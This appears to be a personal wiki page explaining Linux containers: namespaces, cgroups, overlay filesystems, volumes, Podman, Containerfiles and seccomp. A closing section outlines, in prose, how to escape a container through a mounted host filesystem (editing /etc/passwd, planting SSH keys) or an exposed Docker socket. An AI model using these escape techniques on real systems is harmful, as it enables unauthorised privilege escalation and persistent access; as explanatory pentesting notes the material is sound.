Containers

What's a Container?

It's like a pre-configured VM that comes installed with whatever software you want. The difference is that instead of being a fully-virtualized OS, it shares its resources with the host OS and runs a limited set of software. As a result, containers are also more lightweight than a full VM.

For a more intelligent explanation, see the Arch Wiki's page on Linux Containersopen in new window.

As for its utility vs installing into the core OS or building from source, there are a couple of scenarios I've found containers to be useful for.

First, containers can guarantee consistency in the final product. Let's say you want to use nmapopen in new window, but you keep getting errors from scripts because you haven't quite set everything up right, or the dependencies are slightly off and some shared libraries are causing breakage. Just run nmap as a container and you'll have a setup that's always blessed by the developers (or the container's maintainer if it's a separate project).

Second, containers can massively reduce the time it takes to install and configure software, especially for more complex installations. One usecase is spinning up an instance of Oracle DBopen in new window in order to practice pentesting, test some code, etc. Installing with an RPM can leave you with a lot of junk on your system, which isn't really awesome when you just want a quick testbed. Instead of stepping through the installation process, you can run the magic command:

podman run -d \
  --name oracle-db \
  -p 1521:1521 \
  -e ORACLE_PWD=root \
  container-registry.oracle.com/database/free:latest

And you'll have Oracle DB running locally in just a couple of minutes. When you're done with the image, it's similarly simple to purge all artifacts.

Alternatively, this is useful for cases where you generally have to rebuild software from scratch in order to deploy it (read: you're in a corporate environment). Let's take redisopen in new window (an in-memory NoSQL DB) as an example. If you want to install redis with five of the most popular modulesopen in new window, you need to script out the installations steps not just for redis core, but each and every one of the five modules. Now imagine that you want to upgrade - you need to double-check the steps again at minimum alongside the usual sanity checks.

Orrrr, instead of all of that nonsense, you can just pull the pre-built container image and run that.

Side note: these two benefits are what make containers very popular for software development. No longer do you need a long setup guide for a local development environment with endless possibilities to screw up! With a good setup, it can become as easy as running a handful of simple commands.

What Goes Into a Container?

Namespaces

Containers are isolated from the core OS with the use of something called namespacesopen in new window. A chrootopen in new window can be thought of as a filesystem namespace of sorts, and the idea can be extended to:

  • Host and domain name (UTS, short for UNIX Time-Sharing)
  • PID
  • Network
  • Mounts
  • IPC
  • Users
  • Times

Control Groups (cgroups)

Control groupsopen in new window are used to limit resources used by a process, and is obviously useful for containers as well considering they could host resource-intensive applications.

Overlay Filesystem

If you've ever tried to upgrade a container to the latest version, you probably noticed that it's fairly quick and doesn't involve re-downloading the entire image. How could that possibly be?

TL;DR It's a filesystem with static, incremental changes like you have with git.

This is achieved with something called an overlay filesystemopen in new window. Essentially you start with a base filesystem layer that is immutable, even though it doesn't appear that way. When you make changes to the filesystem, you're actually writing changes to an upper layer that is writable and tracks whatever changes you've made. When you commit those changes, a new read-only filesystem layer is created with your changes and just your changes. The end result will be a filesystem with all the changes applied on top of each other.

So when you pull a container image again to upgrade it, you're actually pulling the latest filesystem layers that have been added and then applying them on top of the prior base.

Along these lines, we can derive some other more minor ideas:

  • You can't modify the base image simply by changing data at runtime. Those modifications are ephemeral and will disappear once the container is stopped.
  • If two images have the same base in common, e.g. RHEL 8.x, the container runtime can utilize caching in order to avoid repeatedly pulling down the same filesystem layers over and over again.

Volumes/Bind Mounts

If container filesystems are immutable, then how can we use persistent data? To do this, you use something called a volumeopen in new window, which will link a directory on your host to the container. At the most basic level, the underlying mechanism is something called a bind mountopen in new window. If you're familiar with symbolic links, they're basically a symlink at the filesystem level.

TIP

Volumes don't have to be a bind mount. Check the Docker documentation to learn more about some other (Docker-specific) possibilities.

Networking

TODO

Write this.

Container Runtimes

There are many tools that allow you to run containers. The most common one is of course Dockeropen in new window, and Podmanopen in new window is another popular alternative. Some other runtimes include:

  • runc
    • Docker builds on top of this one
  • LXC and LXD
  • OpenVZ
  • Rkt

Opinion Time!

Which one should you use? I'd recommend Podman for the following reasons:

  1. It's more free!
  2. It creates and manages containers like you'd expect as a beginner.
  3. It has the concept of "pods" for running multiple containers in a group. Hint: this concept will come in handy for Kubernetes.

Containerfiles

In order to create a container from scratch, you need to write something called a Containerfile (if you're using Docker, you can also call this a Dockerfile). Here you specify the base image, a set of commands to run for your desired setup, the default entrypoint and arguments, etc.

For a simple example, here's a container that starts a webserver with httpd:

FROM rockylinux:8-minimal
RUN yum-y install httpd
EXPOSE 80/tcp
ENTRYPOINT ["/usr/sbin/httpd"]
CMD ["-D", "FOREGROUND"]

Container Registries

This is like the package repository used by Linux distributions. They just host container images for people to download and run.

There are a number of container registries out there, but the most common is probably Docker Hubopen in new window.

Container Security

seccomp

Containers share resources with the host OS, including the kernel. How can we restrict kernel-level interactions with the host?

Containers can utilize seccompopen in new window security profiles, a Linux kernel feature, in order to restrict the syscalls that a container can make. Specifically, they are a whitelist of the syscalls that your container is allowed to make. This is useful for running containers while still following the principle of least privilege.

Seccomp is enabled by default in Docker (and other runtimes?), and the whitelist is a pretty sane default out of the box. However, the seccomp profile can be tuned to your needs as required.

For more information, see these pages from:

Privileged Containers

TODO

Write this.

Auditing Containers

TODO

Write this.

Exploitation

Disclaimer

This section will be short to begin with, but will evolve over time.

Insecure Volumes

When creating volumes, you need to be mindful of what you include.

If a container has the entire host filesystem mounted inside the container, then exploitation is generally going to be pretty trivial. Add a user to /etc/passwd, plant a backdoor SSH key, etc. Pick your favorite method, escalating privileges if needed.

Also search for credentials to other services - they can provide a pivot point.

Exposed Docker Socket

Docker creates containers a bit differently. Instead of just, ya know, creating a container, the docker binary communicates with a management socket to manage containers. This can be useful when you're deploying a new version of your app's container, but if it's mounted in the container, there's a unique exploitation vector.

If the Docker socket is present in the container, you can just create a new container that does whatever you want. Get creative.

Last Updated: